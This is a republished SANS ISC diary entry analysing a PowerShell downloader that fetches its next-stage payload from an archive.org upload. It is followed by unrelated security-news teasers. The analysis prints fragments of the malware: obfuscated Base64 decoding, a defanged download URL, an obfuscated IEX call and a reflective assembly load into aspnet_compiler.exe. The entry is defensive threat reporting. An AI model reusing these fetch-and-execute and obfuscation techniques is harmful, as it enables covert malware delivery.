[SANS ISC] Malicious Content Delivered Through archive.org, (Thu, Jul 29th)

archive.org[1], also known as the “way back machine” is a very popular Internet site that allows you to travel back in time and browse old versions of a website (like the ISC website[2]). It works like regular search engines and continuously crawls the internet via bots. But there is another way to store content on archive.org: You may create an account and upload some content by yourself.

I found a piece of malicious Powershell that uses archive.org to download the next stage payload. It’s score on VT is only 5/58[3] (SHA256:2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b). The script is quite simple:

$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = “Fr”+”omBa”+”se6″+”4Str”+”ing”
$D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE))
return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG
$TYFGYTFFFYTFYTFYTFYT = ‘hxxps://ia601505[.]us[.]archive[.]org/1/items/server-lol-123_20210606/Server_lol_123.txt’
$Run=($HBAR -Join ”)|I`E`X

The Base64 data is decoded and contains more Powershell code working like a downloader. It fetches the next payload from archive.org, dumps it on the disk, and executes it with the help of the following technique:

[Reflection.Assembly]::Load($H5).GetType(‘VBNET.PE’).GetMethod(‘Run’).Invoke($null,[object[]] ( ‘C:WindowsMicrosoft.NETFrameworkv4.0.30319aspnet_compiler.exe’,$H1))

Let’s put aside the malware (a classic one) and give more focus on the file grabbed from archive.org. If you go one directory above, you’ll see a directory listing:

The interesting file is server-lol-123_20210606_meta.xml. It reveals interesting information about the attacker:

<scanner>Internet Archive HTML5 Uploader 1.6.4</scanner>
<title>Server Lol 123</title>
<uploader>[email protected]</uploader>
<publicdate>2021-06-06 06:52:29</publicdate>
<addeddate>2021-06-06 06:52:29</addeddate>
[curator][email protected][/curator][date]20210606065744[/date][comment]checked for malware[/comment]

As you can see, this user uploaded a lot of files:

That’s the wild Internet today: If you allow users to create an account and upload some data, chances are big that the feature will be (ab)used to host malicious content. Indeed, archive.org is a top domain and is usually not blocked or tagged as malicious.

[1] https://archive.org
[2] https://web.archive.org/web/*/isc.sans.edu
[3] https://www.virustotal.com/gui/file/2c661f8145f82a3010e0d5038faab09ea56bf93dd55c1d40f1276c947572597b/details

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Source: Read More (SANS Internet Storm Center, InfoCON: green)

You might be interested in …

[ZDNet] US House terminates deal with iConstituent after company waited days to raise ransomware alarm

All posts, ZDNet

The constituent communication platform was hit with a ransomware attack in May and waited nearly a week to notify government officials. Source: Read More (Latest topics for ZDNet in Security)

Read More

[ZDNet] How surveillance capitalism will totally transform the domain name system

All posts, ZDNet

APNIC’s Geoff Huston predicts a world where paranoid apps add ‘oblivion’ to the DNS to protect privacy. Their privacy, not yours. Source: Read More (Latest topics for ZDNet in Security)

Read More

[ThreatPost] WooCommerce Multi Currency Bug Allows Shoppers to Change eCommerce Pricing

All posts, ThreatPost

The security vulnerability can be exploited with a malicious CSV file. Source: Read More (Threatpost)

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.